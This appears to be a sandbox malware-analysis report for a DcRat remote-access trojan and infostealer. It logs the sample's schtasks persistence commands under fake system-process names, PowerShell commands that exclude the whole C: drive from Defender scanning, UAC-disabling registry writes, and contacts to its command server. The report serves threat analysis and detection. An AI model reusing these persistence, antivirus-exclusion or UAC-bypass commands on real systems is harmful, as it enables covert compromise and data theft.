schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac82" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac82" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jdk1.7.0_80\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Java\jdk1.7.0_80\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Java\jdk1.7.0_80\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\MSOCache\All Users\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\SoftwareDistribution\DataStore\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\DataStore\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\DataStore\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Mail\fr-FR\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\fr-FR\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\fr-FR\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\SendTo\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\SendTo\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Adobe\Updater6\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Updater6\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Adobe\Updater6\taskhost.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6eb7dc68-3b56-4104-8492-15fd7469c7f3.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\872ca587-b503-40a7-a7e8-a0ec98bc2b7b.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a4254bd3-725a-4097-83ab-caf4b342bb22.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\75126c4d-4415-4941-a7af-6220b54e4f05.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c99bb55e-d369-46c0-bbd3-885f2cdc68ce.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\500b6a95-69a2-43d4-84a4-56733331fc39.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2a934ab6-a0be-45da-9120-2ecfbd65a366.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\37391401-52e6-4435-8f98-a72a90dcefdd.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d371ec06-88b8-4b79-83dd-f9b9e83bab5c.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2c590d8-e616-4064-9d48-984d30f16e36.vbs"

C:\MSOCache\All Users\lsass.exe

"C:\MSOCache\All Users\lsass.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11c3c6e3-e37d-45ad-b327-36b9310f5414.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6eee1b04-c6b7-4099-aa33-70c37ba7f555.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp

Files

memory/2756-0-0x000007FEF5A53000-0x000007FEF5A54000-memory.dmp

memory/2756-1-0x0000000001140000-0x000000000147C000-memory.dmp

memory/2756-2-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2756-3-0x0000000000440000-0x000000000044E000-memory.dmp

memory/2756-4-0x0000000000450000-0x000000000045E000-memory.dmp

memory/2756-6-0x0000000000470000-0x000000000048C000-memory.dmp

memory/2756-5-0x0000000000460000-0x0000000000468000-memory.dmp

memory/2756-7-0x0000000000490000-0x0000000000498000-memory.dmp

memory/2756-8-0x0000000000520000-0x0000000000530000-memory.dmp

memory/2756-9-0x0000000000530000-0x0000000000546000-memory.dmp

memory/2756-10-0x0000000000550000-0x0000000000558000-memory.dmp

memory/2756-11-0x0000000000580000-0x0000000000590000-memory.dmp

memory/2756-12-0x0000000000560000-0x000000000056A000-memory.dmp

memory/2756-13-0x0000000000590000-0x00000000005E6000-memory.dmp

memory/2756-14-0x0000000000570000-0x000000000057C000-memory.dmp

memory/2756-16-0x0000000000B20000-0x0000000000B2C000-memory.dmp

memory/2756-17-0x0000000000B30000-0x0000000000B38000-memory.dmp

memory/2756-15-0x0000000000B10000-0x0000000000B18000-memory.dmp

memory/2756-18-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/2756-19-0x0000000000B70000-0x0000000000B7C000-memory.dmp

memory/2756-20-0x0000000000BC0000-0x0000000000BCC000-memory.dmp

memory/2756-21-0x0000000000BD0000-0x0000000000BDC000-memory.dmp

memory/2756-22-0x0000000000D70000-0x0000000000D7C000-memory.dmp

memory/2756-23-0x0000000000D80000-0x0000000000D88000-memory.dmp

memory/2756-24-0x0000000000D90000-0x0000000000D9A000-memory.dmp

memory/2756-25-0x0000000000DA0000-0x0000000000DAE000-memory.dmp

memory/2756-27-0x0000000000DC0000-0x0000000000DCE000-memory.dmp

memory/2756-26-0x0000000000DB0000-0x0000000000DB8000-memory.dmp

memory/2756-28-0x0000000000DD0000-0x0000000000DDC000-memory.dmp

memory/2756-29-0x0000000000DE0000-0x0000000000DE8000-memory.dmp

memory/2756-30-0x0000000000F70000-0x0000000000F7A000-memory.dmp

memory/2756-32-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2756-31-0x0000000000F80000-0x0000000000F8C000-memory.dmp

C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\smss.exe

MD5 a785b1ff3467b61f4506c7022ad13e31
SHA1 9f76c04963f2de14f4aaa13dcf9af98f79f89a91
SHA256 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8
SHA512 ca56b31a25b23de63fc7131788c350f0081c5673fc7456781a93f2ec9852948d5500e5fd06c30924dd6614e7bc2a1bc9346f02e067a06bb4b26c96f70f6ad0c9

C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe

MD5 5f79b5b49f38267a4a858ce0c2c44464
SHA1 99246d2d0af48e3a355c8685acbc24edaae9c6ab
SHA256 e3aaa06dcbb63eec2f23ea859584f5e31a5a4c0d12298a8164bad01a175e2b33
SHA512 2a19ad94554fbd59b12fb58e46f3dab04294b4a1f16413d4b3cb2998708459dc8b547cdef20b38bf94d23ffb26806300486bbd3eba970459976c5776bf2098d4

C:\Program Files\Windows Journal\it-IT\csrss.exe

MD5 acc2bbc77b63d4f95be5d48018c688a1
SHA1 86d3bb175d5c4c728bd7378751d2df53ede609d7
SHA256 c1d0f028f948af197fd55ead074e5c0bb3bfb3548373507a6bb9e3a038d52468
SHA512 e713ac4ef6ef17509a65c1d1835884581523d18b3cac3226e2d6c9595e08fd72f374f9a4e1bb0411ad3f62998ad0ab5d37847cbea1e8a7cbfc3ef3246b8e1c77

C:\MSOCache\All Users\lsass.exe

MD5 ff6dba90af15cea2ed595f7577d4a0db
SHA1 e267723591b77e3edeee90f1831e9ce3a88719aa
SHA256 37d074384ebc304b9a60d2f4cd95940d4672a0cbf214509cc3fd97ac41d1205b
SHA512 ce8551d6aa501b03ce604e6f49c18464b33d3527a04f25c451148fe7a89489a51f86befc4461f536737d63720cc73915e3116fb0308ec8e0f2e4181ccdfd5f14

C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe

MD5 6cbc93df87d1d7f0b1e841c277236322
SHA1 aaefa814e47d232f3be96fe54fdee219b30058ac
SHA256 605028478feda1d12eec2368e572e0734a0ce9cb4098192df83a7d276f049157
SHA512 82812a8c6208a468eae95bee40115cc47f1e7b179e499473b07c0e95be0acdafa491c01b084a5e4f640994aaef4fecc50d9c5bcab569bea5654f0b4441b10a18

C:\ProgramData\Adobe\Updater6\RCX5382.tmp

MD5 156c1ed17902262eeb68d4f521ea30c2
SHA1 7c7607cc05aaede848712b5c8457ed2c5730b0e4
SHA256 c5c60e427260a41cc5043ee2f96397c122f22fdb4cb42cc7bbb758929ab0d6a2
SHA512 545d97f8024ad14e74136f213265df2ec17a194b9a741020ed44dfb75b1d21f5c2aa4e5ec2238ae0b5ab39866eac55d77c0384ec74c59eaa1ce92985842b4564

memory/1296-288-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d3713000e5a79148493d20ab3b7428eb
SHA1 29819bcb2aa915f8aed9296c7197cd41f5e6f678
SHA256 3d7e547587e51f9caf93d1bd627fbed612d2c9f42dc350bdf9b724e17b7606e5
SHA512 8c9354bd76889270c1ab5bd32c6bb5209ae62085217946c40ef894bec0dd37ae7995624759749d3a6be4c8e30a1cdac160577fdce57a2e5d51e3b24172c29301

memory/1296-313-0x0000000001E60000-0x0000000001E68000-memory.dmp

memory/2000-349-0x0000000000350000-0x000000000068C000-memory.dmp

memory/2756-350-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2000-351-0x00000000008C0000-0x0000000000916000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6eb7dc68-3b56-4104-8492-15fd7469c7f3.vbs

MD5 790fe28488bb6aeb0f38dfe07abf7f04
SHA1 81b74339f0a3c7263096e54b73d404fd3e192a9f
SHA256 9de7ed22e30bc0bf034380b21f8975bb2ee088d8d12c20e5a9a30dd7bcece0e7
SHA512 25b4f77b681da79ea7e24ebf4e45a5f4db7cade86ac685d5e0396d484992f7eac220e255586506af35268069ebb215db4729bfd8a653654c6696d30b62d9077e

C:\Users\Admin\AppData\Local\Temp\872ca587-b503-40a7-a7e8-a0ec98bc2b7b.vbs

MD5 e01269bef8d7bdb82a6b0f155fec4216
SHA1 bc1db2a55f38b9a2c9c4842be570a2c0b802480b
SHA256 f07b4f58044dadce241a7ab7e826eb06aeb5a263d52fe4f4a399e8589169aca0
SHA512 58d3e0dcfcbdf0a43858a52094f48d54e119c965d6d26a58dc0fa36a7e28a1e99007051943940db90822318aa945d363a66f7cef3cc306b9b72efbc4283b6970

memory/828-362-0x0000000000CA0000-0x0000000000FDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a4254bd3-725a-4097-83ab-caf4b342bb22.vbs

MD5 11b813f842b0adf6c935fb693b24d2c2
SHA1 99a36391822ee739cf1be0e9188208979aee9600
SHA256 5cf601945bc5927d8a90a0eb3aa7fa8aec8fd4b2594c1db91966abf6acf17944
SHA512 2194fe9f63c4e774117f945823fb66838feb86dcf9927d3e5767802f5554bd925d05e63613eec8d36f504673e6c0e559ad8692978d186d8d6d54ba9bb6cee209

C:\Users\Admin\AppData\Local\Temp\c99bb55e-d369-46c0-bbd3-885f2cdc68ce.vbs

MD5 0dcdeef3c74b8e2e8564eba824b6f633
SHA1 11541689002b1c4430a90f356798c85d2bc2fc38
SHA256 d9a95ef860f80109e1cc06c430d349bb92687e270b4d67f9c8827a1a599adf35
SHA512 f87ad4bebe31ee17ac413d91753076d3df020daef7145e1118b26facd1075898b4238356fe955e41bf85914e0806dc227cc5ae07eb823940e99f478b01f168f7

memory/2872-385-0x0000000000220000-0x000000000055C000-memory.dmp

memory/2872-386-0x00000000009D0000-0x00000000009E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2a934ab6-a0be-45da-9120-2ecfbd65a366.vbs

MD5 19e6ea6c538bb6ef26dbcc1fc4deb6fd
SHA1 3e1623ff1ea6ec7fe345e737119bc37ae1de7105
SHA256 b02d61dcc070c4d068ac0ca56f1c6b574a0882134a7d9850dc3a7037757bcc6e
SHA512 77e056bbfe9a183d05d936fd71766a1ccd44fa48489cd7333060a4b31aae99662467377765482351b679232a1a1f4ee82281b3f19d713dd4872c9cee8c5c1ad5

memory/2816-398-0x00000000012D0000-0x000000000160C000-memory.dmp

memory/2816-399-0x0000000000860000-0x00000000008B6000-memory.dmp

memory/2816-400-0x0000000000640000-0x0000000000652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d371ec06-88b8-4b79-83dd-f9b9e83bab5c.vbs

MD5 8f7d1eaa33c20fa7aeb539cd8bc4b28a
SHA1 2e7aa689d009d1193eef7ee1b9fb7e1b9a1433e7
SHA256 4ec1156d7ede90720d1183d47f09388951e78b31448a91b729c0d814b600e429
SHA512 701a7db13cd5eccc715c4b1d01972b3f6844cf5e25e8ea9061536d98b3e8b73891ae07237f036a3ddae18be61b5494ed9e2e7354f7b79d390901abd6608e8d99

C:\Users\Admin\AppData\Local\Temp\11c3c6e3-e37d-45ad-b327-36b9310f5414.vbs

MD5 81020c333b0367427390dd0a7b56b7e9
SHA1 220363d0a2f4fed62373ba7058ea9a4b8ef0f112
SHA256 0a95432c3fc2d7d91227193eb0d43d827921311f68a90548fc41ff884a5f9d60
SHA512 9ea21aec0fb6bb337570f2acdedc9c3e84ace5fe2b1e63ee99a2a192c2ffa9fff86aa08fbee38c846eb4ba4eb9c9bc6fb17bbfa958dee67cf3ae5c3b5cc7109a

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 19:47

Reported

2024-05-31 19:50

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
